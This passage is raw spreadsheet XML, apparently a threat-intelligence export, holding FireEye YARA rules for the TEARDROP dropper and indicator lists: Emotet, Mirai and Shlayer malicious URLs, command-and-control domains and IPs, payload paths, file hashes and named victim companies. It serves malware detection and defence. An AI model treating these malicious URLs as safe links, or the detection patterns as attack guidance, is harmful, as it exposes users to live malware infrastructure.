        $ss2 = "system\\currentcontrolset\\control\\lsa\\$_" ascii nocase wide_x005F_x000D_
        $ss3 = "[security.cryptography.md5]::create()" ascii nocase wide_x005F_x000D_
        $ss4 = "[system.security.principal.windowsidentity]::getcurrent().name" ascii nocase wide_x005F_x000D_
        $ss5 = "out-file" ascii nocase wide_x005F_x000D_
        $ss6 = "convertto-securestring" ascii nocase wide_x005F_x000D_
    condition:_x005F_x000D_
        all of them_x005F_x000D_
}_x005F_x000D_
rule APT_Dropper_Raw64_TEARDROP_1_x005F_x000D_
{_x005F_x000D_
    meta:_x005F_x000D_
        author = "FireEye"_x005F_x000D_
        description = "This rule looks for portions of the TEARDROP backdoor that are vital to how it functions. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory."_x005F_x000D_
    strings:_x005F_x000D_
        $sb1 = { C7 44 24 ?? 80 00 00 00 [0-64] BA 00 00 00 80 [0-32] 48 8D 0D [4-32] FF 15 [4] 48 83 F8 FF [2-64] 41 B8 40 00 00 00 [0-64] FF 15 [4-5] 85 C0 7? ?? 80 3D [4] FF }_x005F_x000D_
        $sb2 = { 80 3D [4] D8 [2-32] 41 B8 04 00 00 00 [0-32] C7 44 24 ?? 4A 46 49 46 [0-32] E8 [4-5] 85 C0 [2-32] C6 05 [4] 6A C6 05 [4] 70 C6 05 [4] 65 C6 05 [4] 67 }_x005F_x000D_
        $sb3 = { BA [4] 48 89 ?? E8 [4] 41 B8 [4] 48 89 ?? 48 89 ?? E8 [4] 85 C0 7? [1-32] 8B 44 24 ?? 48 8B ?? 24 [1-16] 48 01 C8 [0-32] FF D0 }_x005F_x000D_
    condition:_x005F_x000D_
        all of them_x005F_x000D_
}_x005F_x000D_
rule APT_Dropper_Win64_TEARDROP_1_x005F_x000D_
{_x005F_x000D_
    meta:_x005F_x000D_
        author = "FireEye"_x005F_x000D_
        description = "This rule is intended match specific sequences of opcode found within TEARDROP, including those that decode the embedded payload. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory."_x005F_x000D_
    strings:_x005F_x000D_
        $loc_4218FE24A5 = { 48 89 C8 45 0F B6 4C 0A 30 }_x005F_x000D_
        $loc_4218FE36CA = { 48 C1 E0 04 83 C3 01 48 01 E8 8B 48 28 8B 50 30 44 8B 40 2C 48 01 F1 4C 01 FA }_x005F_x000D_
        $loc_4218FE2747 = { C6 05 ?? ?? ?? ?? 6A C6 05 ?? ?? ?? ?? 70 C6 05 ?? ?? ?? ?? 65 C6 05 ?? ?? ?? ?? 67 }_x005F_x000D_
        $loc_5551D725A0 = { 48 89 C8 45 0F B6 4C 0A 30 48 89 CE 44 89 CF 48 F7 E3 48 C1 EA 05 48 8D 04 92 48 8D 04 42 48 C1 E0 04 48 29 C6 }_x005F_x000D_
        $loc_5551D726F6 = { 53 4F 46 54 57 41 52 45 ?? ?? ?? ?? 66 74 5C 43 ?? ?? ?? ?? 00 }_x005F_x000D_
    condition:_x005F_x000D_
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them_x005F_x000D_
}</t>
  </si>
  <si>
    <t>1607974897</t>
  </si>
  <si>
    <t>https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</t>
  </si>
  <si>
    <t>https://github.com/fireeye/sunburst_countermeasures</t>
  </si>
  <si>
    <t>https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f</t>
  </si>
  <si>
    <t>1555344470</t>
  </si>
  <si>
    <t>1555344494</t>
  </si>
  <si>
    <t>http://situsprediksijitu.com/wp-includes/file/service/ios/EN/04-2019/</t>
  </si>
  <si>
    <t>Emotet Gang Switches to Highly Customized Templates Utilizing Stolen Email Content from Victims</t>
  </si>
  <si>
    <t>https://escapadesgroup.com.au/cgi-bin/US/support/ios/EN/042019/</t>
  </si>
  <si>
    <t>http://hirosys.biz/wp-content/llc/support/secure/EN/2019-04/</t>
  </si>
  <si>
    <t>http://107.178.221.225/jxewyv9/inc/support/ios/En_en/042019/</t>
  </si>
  <si>
    <t>http://raraty-squires.com/blog/sXzf-4ihmhkO8ISXaF6N_xpQxoZZcQ-fgs/</t>
  </si>
  <si>
    <t>http://newsmafia.in/d/security/support/sec/EN/2019-04/</t>
  </si>
  <si>
    <t>https://jlseditions.fr/wp-content/SPNT-FNzUWeaXTjQ8nqv_qWocBOMe-RT6/</t>
  </si>
  <si>
    <t>http://netcom-soft.com/eng/NgqF-1QgEEkvjQ0MkjZ_zYLYiaLye-Z8t/</t>
  </si>
  <si>
    <t>http://132.145.153.89/trust.accs.send.net/files/messages/sec/en_EN/201904/</t>
  </si>
  <si>
    <t>http://tem2.belocal.today/optometrist/privacy/messages/sec/En_en/2019-04/</t>
  </si>
  <si>
    <t>https://cofense.com/emotet-gang-switches-highly-customized-templates-utilizing-stolen-email-content-victims/</t>
  </si>
  <si>
    <t>1480624304</t>
  </si>
  <si>
    <t>1480624497</t>
  </si>
  <si>
    <t>https://securelist.com/blog/incidents/76791/new-wave-of-mirai-attacking-home-routers/</t>
  </si>
  <si>
    <t>New wave of Mirai attacking home routers</t>
  </si>
  <si>
    <t>1480624478</t>
  </si>
  <si>
    <t>timeserver[.]host</t>
  </si>
  <si>
    <t>securityupdates.us</t>
  </si>
  <si>
    <t>l.ocalhost[.]host</t>
  </si>
  <si>
    <t>tr069.pw</t>
  </si>
  <si>
    <t>srrys.pw</t>
  </si>
  <si>
    <t>93.174.93.50</t>
  </si>
  <si>
    <t>188.209.49.64</t>
  </si>
  <si>
    <t>188.209.49.86</t>
  </si>
  <si>
    <t>188.209.49.60</t>
  </si>
  <si>
    <t>188.209.49.168</t>
  </si>
  <si>
    <t>5.8.65.1</t>
  </si>
  <si>
    <t>5.188.232.1</t>
  </si>
  <si>
    <t>5.188.232.2</t>
  </si>
  <si>
    <t>5.188.232.3</t>
  </si>
  <si>
    <t>5.188.232.4</t>
  </si>
  <si>
    <t>212.92.127.146</t>
  </si>
  <si>
    <t>5.188.232.71</t>
  </si>
  <si>
    <t>5.188.232.141</t>
  </si>
  <si>
    <t>5.188.232.152</t>
  </si>
  <si>
    <t>37.139.59.69</t>
  </si>
  <si>
    <t>ff47ff97021c27c058bbbdc9d327b9926e02e48145a4c6ea2abfdb036d992557</t>
  </si>
  <si>
    <t>ff6e949c7d1cd82ffc4a1b27e488b84e07959472ed05755548efec90df82701e</t>
  </si>
  <si>
    <t>ace9c1fe40f308a2871114da0d0d2f46965add1bda9c4bad62de5320b77e8a73</t>
  </si>
  <si>
    <t>4b759457fbb423375510fa5125b6ac28ae7b347eb544be4ad21b4cbc8e91450d</t>
  </si>
  <si>
    <t>fc683bdfc51b2f4eec162e80ab253f3d7f5f22a1c64630c7c7d5509932a6a346</t>
  </si>
  <si>
    <t>1fce697993690d41f75e0e6ed522df49d73a038f7e02733ec239c835579c40bf</t>
  </si>
  <si>
    <t>828984d1112f52f7f24bbc2b15d0f4cf2646cd03809e648f0d3121a1bdb83464</t>
  </si>
  <si>
    <t>c597d3b8f61a5b49049006aff5abfe30af06d8979aaaf65454ad2691ef03943b</t>
  </si>
  <si>
    <t>046659391b36a022a48e37bd80ce2c3bd120e3fe786c204128ba32aa8d03a182</t>
  </si>
  <si>
    <t>5d4e46b3510679dc49ce295b7f448cd69e952d80ba1450f6800be074992b07cc</t>
  </si>
  <si>
    <t>518ced3359a6bcab387a8955f5acd98837a912bb354dfb7f53fb71f4f006bcaa</t>
  </si>
  <si>
    <t>384fa987fb32231f758c4ee3bc1008ad5ed1fb94335f0e13b646ad39c901e81a</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759/</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/</t>
  </si>
  <si>
    <t>1519924468</t>
  </si>
  <si>
    <t>1519924933</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/</t>
  </si>
  <si>
    <t>Sofacy Attacks Multiple Government Entities</t>
  </si>
  <si>
    <t>1519924631</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/Simple+but+Effective+Malicious+XLS+Sheet/23305/</t>
  </si>
  <si>
    <t>1519924909</t>
  </si>
  <si>
    <t>ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8</t>
  </si>
  <si>
    <t>12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8</t>
  </si>
  <si>
    <t>cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7</t>
  </si>
  <si>
    <t>23411bb30042c9357ac4928dc6fca6955390361e660fec7ac238bbdcc8b83701</t>
  </si>
  <si>
    <t>cdnverify.net</t>
  </si>
  <si>
    <t>email-subject</t>
  </si>
  <si>
    <t>Upcoming Defense events February 2018</t>
  </si>
  <si>
    <t>1583062776</t>
  </si>
  <si>
    <t>1583062800</t>
  </si>
  <si>
    <t>4d86ae25913374cfcb80a8d798b9016e</t>
  </si>
  <si>
    <t>Shlayer Trojan attacks one in ten macOS users</t>
  </si>
  <si>
    <t>fa124ed3905a9075517f497531779f92</t>
  </si>
  <si>
    <t>594aa050742406db04a8e07b5d247cdd</t>
  </si>
  <si>
    <t>http://80.82.77.84/.dmg</t>
  </si>
  <si>
    <t>Malicious links</t>
  </si>
  <si>
    <t>http://sci-hub.tv</t>
  </si>
  <si>
    <t>http://kodak-world.com</t>
  </si>
  <si>
    <t>http://lkysearchds3822-a.akamaihd.net</t>
  </si>
  <si>
    <t>http://api.typicalarchive.com</t>
  </si>
  <si>
    <t>C&amp;C Urls</t>
  </si>
  <si>
    <t>http://api.entrycache.com</t>
  </si>
  <si>
    <t>http://api.macsmoments.com</t>
  </si>
  <si>
    <t>https://securelist.com/shlayer-for-macos/95724/</t>
  </si>
  <si>
    <t>1536232412</t>
  </si>
  <si>
    <t>1536232668</t>
  </si>
  <si>
    <t>CVE-2018-11776</t>
  </si>
  <si>
    <t>Apache Struts 2 Vulnerability (CVE-2018-11776) Exploited in CroniX Crypto-Mining Campaign</t>
  </si>
  <si>
    <t>107.181.160.197</t>
  </si>
  <si>
    <t>asq.r77vh0.pw</t>
  </si>
  <si>
    <t>pattern-in-traffic</t>
  </si>
  <si>
    <t>1536232626</t>
  </si>
  <si>
    <t>/lin/anacrond</t>
  </si>
  <si>
    <t>1536232639</t>
  </si>
  <si>
    <t>/lin/update.sh</t>
  </si>
  <si>
    <t>/win/checking.ps1</t>
  </si>
  <si>
    <t>/win/checking-test.hta</t>
  </si>
  <si>
    <t>1536232660</t>
  </si>
  <si>
    <t>https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Atr_type</t>
  </si>
  <si>
    <t>Created_time</t>
  </si>
  <si>
    <t>Last_modified</t>
  </si>
  <si>
    <t>Peroid</t>
  </si>
  <si>
    <t>Is_IDS</t>
  </si>
  <si>
    <t>Deleted</t>
  </si>
  <si>
    <t>Disable_Correlation</t>
  </si>
  <si>
    <t>Atr_Value</t>
  </si>
  <si>
    <t>Is_Object</t>
  </si>
  <si>
    <t>Comment</t>
  </si>
  <si>
    <t>Object_Name</t>
  </si>
  <si>
    <t>Object_Description</t>
  </si>
  <si>
    <t>Object meta_cat</t>
  </si>
  <si>
    <t>Object_relation</t>
  </si>
  <si>
    <t>Object_UUID</t>
  </si>
  <si>
    <t>Threat_level</t>
  </si>
  <si>
    <t>Event_Name</t>
  </si>
  <si>
    <t>Organization</t>
  </si>
  <si>
    <t>Event_Category</t>
  </si>
  <si>
    <t>Targeting data</t>
  </si>
  <si>
    <t>target-org</t>
  </si>
  <si>
    <t>1643987990</t>
  </si>
  <si>
    <t>1644231782</t>
  </si>
  <si>
    <t>Oiltanking GmbH Group</t>
  </si>
  <si>
    <t>victim</t>
  </si>
  <si>
    <t>Victim object describes the target of an attack or abuse.</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>0722216e-a7af-41da-a9e0-3b5e892fe2e8</t>
  </si>
  <si>
    <t>Cyberattack on fuel supplier causes supply chain disruption</t>
  </si>
  <si>
    <t>1643987997</t>
  </si>
  <si>
    <t>Mabanaft GmbH &amp; Co. KG Group</t>
  </si>
  <si>
    <t>f4cee161-fb4b-4ddf-b0b9-4e9574c471bf</t>
  </si>
  <si>
    <t>1643988002</t>
  </si>
  <si>
    <t>SEA-Tank</t>
  </si>
  <si>
    <t>04637516-a3c5-46c9-8cd9-6d19c53a0e7c</t>
  </si>
  <si>
    <t>1643988009</t>
  </si>
  <si>
    <t>Oiltanking</t>
  </si>
  <si>
    <t>32fe5b78-66a1-4e42-8e69-8472989790fa</t>
  </si>
  <si>
    <t>1644000688</t>
  </si>
  <si>
    <t>Evos</t>
  </si>
  <si>
    <t>497a6760-7370-4443-859d-a13e209931f8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</si>
</sst>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Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>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1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2"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EC0C34-56BA-B440-8051-6A3D4AA22132}">
  <dimension ref="A1:U3768"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A3744" workbookViewId="0">
      <selection activeCell="C3773" sqref="C3773"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <sheetData>
    <row r="1" spans="1:21" x14ac:dyDescent="0.2">
      <c r="B1" s="1" t="s">
        <v>4553</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>4554</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>4555</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>4556</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>4557</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>4558</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>4559</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>4560</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>4561</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>4562</v>
      </c>
      <c r="L1" s="1" t="s">
        <v>4563</v>
      </c>
      <c r="M1" s="1" t="s">
        <v>4564</v>
      </c>
      <c r="N1" s="1" t="s">
        <v>4565</v>
      </c>
      <c r="O1" s="1" t="s">
        <v>4566</v>
      </c>
      <c r="P1" s="1" t="s">
        <v>4567</v>
      </c>
      <c r="Q1" s="1" t="s">
        <v>4568</v>
      </c>
      <c r="R1" s="1" t="s">
        <v>4569</v>
      </c>
      <c r="S1" s="1" t="s">
        <v>4570</v>
      </c>
      <c r="T1" s="1" t="s">
        <v>4571</v>
      </c>
      <c r="U1" s="3" t="s">
        <v>4572</v>
      </c>
    </row>
    <row r="2" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2" s="1">
        <v>16370</v>
      </c>
      <c r="B2" t="s">
        <v>0</v>
      </c>
      <c r="C2" t="s">
        <v>1</v>
      </c>
      <c r="D2" t="s">
        <v>2</v>
      </c>
      <c r="E2" t="s">
        <v>3</v>
      </c>
      <c r="F2">
        <v>20</v>
      </c>
      <c r="G2" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2" t="s">
        <v>4</v>
      </c>
      <c r="K2">
        <v>0</v>
      </c>
      <c r="R2" t="s">
        <v>5</v>
      </c>
      <c r="S2" t="s">
        <v>6</v>
      </c>
      <c r="T2" t="s">
        <v>7</v>
      </c>
      <c r="U2" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="3" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3" s="1">
        <v>16371</v>
      </c>
      <c r="B3" t="s">
        <v>0</v>
      </c>
      <c r="C3" t="s">
        <v>1</v>
      </c>
      <c r="D3" t="s">
        <v>2</v>
      </c>
      <c r="E3" t="s">
        <v>3</v>
      </c>
      <c r="F3">
        <v>20</v>
      </c>
      <c r="G3" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3" t="s">
        <v>9</v>
      </c>
      <c r="K3">
        <v>0</v>
      </c>
      <c r="R3" t="s">
        <v>5</v>
      </c>
      <c r="S3" t="s">
        <v>6</v>
      </c>
      <c r="T3" t="s">
        <v>7</v>
      </c>
      <c r="U3" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="4" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A4" s="1">
        <v>16372</v>
      </c>
      <c r="B4" t="s">
        <v>10</v>
      </c>
      <c r="C4" t="s">
        <v>11</v>
      </c>
      <c r="D4" t="s">
        <v>2</v>
      </c>
      <c r="E4" t="s">
        <v>3</v>
      </c>
      <c r="F4">
        <v>20</v>
      </c>
      <c r="G4" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J4" t="s">
        <v>12</v>
      </c>
      <c r="K4">
        <v>0</v>
      </c>
      <c r="R4" t="s">
        <v>5</v>
      </c>
      <c r="S4" t="s">
        <v>6</v>
      </c>
      <c r="T4" t="s">
        <v>7</v>
      </c>
      <c r="U4" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="5" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A5" s="1">
        <v>16373</v>
      </c>
      <c r="B5" t="s">
        <v>13</v>
      </c>
      <c r="C5" t="s">
        <v>14</v>
      </c>
      <c r="D5" t="s">
        <v>3</v>
      </c>
      <c r="E5" t="s">
        <v>3</v>
      </c>
      <c r="F5">
        <v>0</v>
      </c>
      <c r="G5" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J5" t="s">
        <v>15</v>
      </c>
      <c r="K5">
        <v>0</v>
      </c>
      <c r="R5" t="s">
        <v>5</v>
      </c>
      <c r="S5" t="s">
        <v>6</v>
      </c>
      <c r="T5" t="s">
        <v>7</v>
      </c>
      <c r="U5" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="6" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A6" s="1">
        <v>16374</v>
      </c>
      <c r="B6" t="s">
        <v>10</v>
      </c>
      <c r="C6" t="s">
        <v>16</v>
      </c>
      <c r="D6" t="s">
        <v>17</v>
      </c>
      <c r="E6" t="s">
        <v>18</v>
      </c>
      <c r="F6">
        <v>358</v>
      </c>
      <c r="G6" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J6" t="s">
        <v>19</v>
      </c>
      <c r="K6">
        <v>0</v>
      </c>
      <c r="R6" t="s">
        <v>20</v>
      </c>
      <c r="S6" t="s">
        <v>21</v>
      </c>
      <c r="T6" t="s">
        <v>7</v>
      </c>
      <c r="U6" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="7" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A7" s="1">
        <v>16375</v>
      </c>
      <c r="B7" t="s">
        <v>10</v>
      </c>
      <c r="C7" t="s">
        <v>22</v>
      </c>
      <c r="D7" t="s">
        <v>23</v>
      </c>
      <c r="E7" t="s">
        <v>18</v>
      </c>
      <c r="F7">
        <v>169</v>
      </c>
      <c r="G7" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J7" t="s">
        <v>24</v>
      </c>
      <c r="K7">
        <v>0</v>
      </c>
      <c r="L7" t="s">
        <v>25</v>
      </c>
      <c r="R7" t="s">
        <v>20</v>
      </c>
      <c r="S7" t="s">
        <v>21</v>
      </c>
      <c r="T7" t="s">
        <v>7</v>
      </c>
      <c r="U7" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A8" s="1">
        <v>16376</v>
      </c>
      <c r="B8" t="s">
        <v>10</v>
      </c>
      <c r="C8" t="s">
        <v>22</v>
      </c>
      <c r="D8" t="s">
        <v>23</v>
      </c>
      <c r="E8" t="s">
        <v>18</v>
      </c>
      <c r="F8">
        <v>169</v>
      </c>
      <c r="G8" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J8" t="s">
        <v>26</v>
      </c>
      <c r="K8">
        <v>0</v>
      </c>
      <c r="L8" t="s">
        <v>25</v>
      </c>
      <c r="R8" t="s">
        <v>20</v>
      </c>
      <c r="S8" t="s">
        <v>21</v>
      </c>
      <c r="T8" t="s">
        <v>7</v>
      </c>
      <c r="U8" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="9" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A9" s="1">
        <v>16377</v>
      </c>
      <c r="B9" t="s">
        <v>10</v>
      </c>
      <c r="C9" t="s">
        <v>22</v>
      </c>
      <c r="D9" t="s">
        <v>27</v>
      </c>
      <c r="E9" t="s">
        <v>18</v>
      </c>
      <c r="F9">
        <v>144</v>
      </c>
      <c r="G9" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J9" t="s">
        <v>28</v>
      </c>
      <c r="K9">
        <v>0</v>
      </c>
      <c r="L9" t="s">
        <v>29</v>
      </c>
      <c r="R9" t="s">
        <v>20</v>
      </c>
      <c r="S9" t="s">
        <v>21</v>
      </c>
      <c r="T9" t="s">
        <v>7</v>
      </c>
      <c r="U9" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="10" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A10" s="1">
        <v>16378</v>
      </c>
      <c r="B10" t="s">
        <v>10</v>
      </c>
      <c r="C10" t="s">
        <v>22</v>
      </c>
      <c r="D10" t="s">
        <v>30</v>
      </c>
      <c r="E10" t="s">
        <v>18</v>
      </c>
      <c r="F10">
        <v>150</v>
      </c>
      <c r="G10" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J10" t="s">
        <v>31</v>
      </c>
      <c r="K10">
        <v>0</v>
      </c>
      <c r="L10" t="s">
        <v>32</v>
      </c>
      <c r="R10" t="s">
        <v>20</v>
      </c>
      <c r="S10" t="s">
        <v>21</v>
      </c>
      <c r="T10" t="s">
        <v>7</v>
      </c>
      <c r="U10" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="11" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A11" s="1">
        <v>16379</v>
      </c>
      <c r="B11" t="s">
        <v>10</v>
      </c>
      <c r="C11" t="s">
        <v>22</v>
      </c>
      <c r="D11" t="s">
        <v>23</v>
      </c>
      <c r="E11" t="s">
        <v>18</v>
      </c>
      <c r="F11">
        <v>169</v>
      </c>
      <c r="G11" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J11" t="s">
        <v>33</v>
      </c>
      <c r="K11">
        <v>0</v>
      </c>
      <c r="L11" t="s">
        <v>25</v>
      </c>
      <c r="R11" t="s">
        <v>20</v>
      </c>
      <c r="S11" t="s">
        <v>21</v>
      </c>
      <c r="T11" t="s">
        <v>7</v>
      </c>
      <c r="U11" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="12" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A12" s="1">
        <v>16380</v>
      </c>
      <c r="B12" t="s">
        <v>10</v>
      </c>
      <c r="C12" t="s">
        <v>22</v>
      </c>
      <c r="D12" t="s">
        <v>23</v>
      </c>
      <c r="E12" t="s">
        <v>18</v>
      </c>
      <c r="F12">
        <v>169</v>
      </c>
      <c r="G12" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J12" t="s">
        <v>34</v>
      </c>
      <c r="K12">
        <v>0</v>
      </c>
      <c r="L12" t="s">
        <v>25</v>
      </c>
      <c r="R12" t="s">
        <v>20</v>
      </c>
      <c r="S12" t="s">
        <v>21</v>
      </c>
      <c r="T12" t="s">
        <v>7</v>
      </c>
      <c r="U12" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="13" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A13" s="1">
        <v>16381</v>
      </c>
      <c r="B13" t="s">
        <v>10</v>
      </c>
      <c r="C13" t="s">
        <v>22</v>
      </c>
      <c r="D13" t="s">
        <v>35</v>
      </c>
      <c r="E13" t="s">
        <v>18</v>
      </c>
      <c r="F13">
        <v>130</v>
      </c>
      <c r="G13" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J13" t="s">
        <v>36</v>
      </c>
      <c r="K13">
        <v>0</v>
      </c>
      <c r="L13" t="s">
        <v>37</v>
      </c>
      <c r="R13" t="s">
        <v>20</v>
      </c>
      <c r="S13" t="s">
        <v>21</v>
      </c>
      <c r="T13" t="s">
        <v>7</v>
      </c>
      <c r="U13" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="14" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A14" s="1">
        <v>16382</v>
      </c>
      <c r="B14" t="s">
        <v>10</v>
      </c>
      <c r="C14" t="s">
        <v>1</v>
      </c>
      <c r="D14" t="s">
        <v>38</v>
      </c>
      <c r="E14" t="s">
        <v>18</v>
      </c>
      <c r="F14">
        <v>122</v>
      </c>
      <c r="G14" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J14" t="s">
        <v>39</v>
      </c>
      <c r="K14">
        <v>0</v>
      </c>
      <c r="L14" t="s">
        <v>40</v>
      </c>
      <c r="R14" t="s">
        <v>20</v>
      </c>
      <c r="S14" t="s">
        <v>21</v>
      </c>
      <c r="T14" t="s">
        <v>7</v>
      </c>
      <c r="U14" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="15" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A15" s="1">
        <v>16383</v>
      </c>
      <c r="B15" t="s">
        <v>10</v>
      </c>
      <c r="C15" t="s">
        <v>1</v>
      </c>
      <c r="D15" t="s">
        <v>23</v>
      </c>
      <c r="E15" t="s">
        <v>18</v>
      </c>
      <c r="F15">
        <v>169</v>
      </c>
      <c r="G15" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J15" t="s">
        <v>41</v>
      </c>
      <c r="K15">
        <v>0</v>
      </c>
      <c r="L15" t="s">
        <v>25</v>
      </c>
      <c r="R15" t="s">
        <v>20</v>
      </c>
      <c r="S15" t="s">
        <v>21</v>
      </c>
      <c r="T15" t="s">
        <v>7</v>
      </c>
      <c r="U15" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="16" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A16" s="1">
        <v>16384</v>
      </c>
      <c r="B16" t="s">
        <v>13</v>
      </c>
      <c r="C16" t="s">
        <v>14</v>
      </c>
      <c r="D16" t="s">
        <v>42</v>
      </c>
      <c r="E16" t="s">
        <v>18</v>
      </c>
      <c r="F16">
        <v>54</v>
      </c>
      <c r="G16" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J16" t="s">
        <v>43</v>
      </c>
      <c r="K16">
        <v>0</v>
      </c>
      <c r="R16" t="s">
        <v>20</v>
      </c>
      <c r="S16" t="s">
        <v>21</v>
      </c>
      <c r="T16" t="s">
        <v>7</v>
      </c>
      <c r="U16" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="17" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A17" s="1">
        <v>16385</v>
      </c>
      <c r="B17" t="s">
        <v>44</v>
      </c>
      <c r="C17" t="s">
        <v>45</v>
      </c>
      <c r="D17" t="s">
        <v>46</v>
      </c>
      <c r="E17" t="s">
        <v>18</v>
      </c>
      <c r="F17">
        <v>34</v>
      </c>
      <c r="G17" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J17" t="s">
        <v>47</v>
      </c>
      <c r="K17">
        <v>0</v>
      </c>
      <c r="R17" t="s">
        <v>20</v>
      </c>
      <c r="S17" t="s">
        <v>21</v>
      </c>
      <c r="T17" t="s">
        <v>7</v>
      </c>
      <c r="U17" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="18" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A18" s="1">
        <v>16386</v>
      </c>
      <c r="B18" t="s">
        <v>44</v>
      </c>
      <c r="C18" t="s">
        <v>45</v>
      </c>
      <c r="D18" t="s">
        <v>46</v>
      </c>
      <c r="E18" t="s">
        <v>18</v>
      </c>
      <c r="F18">
        <v>34</v>
      </c>
      <c r="G18" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J18" t="s">
        <v>48</v>
      </c>
      <c r="K18">
        <v>0</v>
      </c>
      <c r="R18" t="s">
        <v>20</v>
      </c>
      <c r="S18" t="s">
        <v>21</v>
      </c>
      <c r="T18" t="s">
        <v>7</v>
      </c>
      <c r="U18" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="19" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A19" s="1">
        <v>16387</v>
      </c>
      <c r="B19" t="s">
        <v>44</v>
      </c>
      <c r="C19" t="s">
        <v>45</v>
      </c>
      <c r="D19" t="s">
        <v>46</v>
      </c>
      <c r="E19" t="s">
        <v>18</v>
      </c>
      <c r="F19">
        <v>34</v>
      </c>
      <c r="G19" t="b">
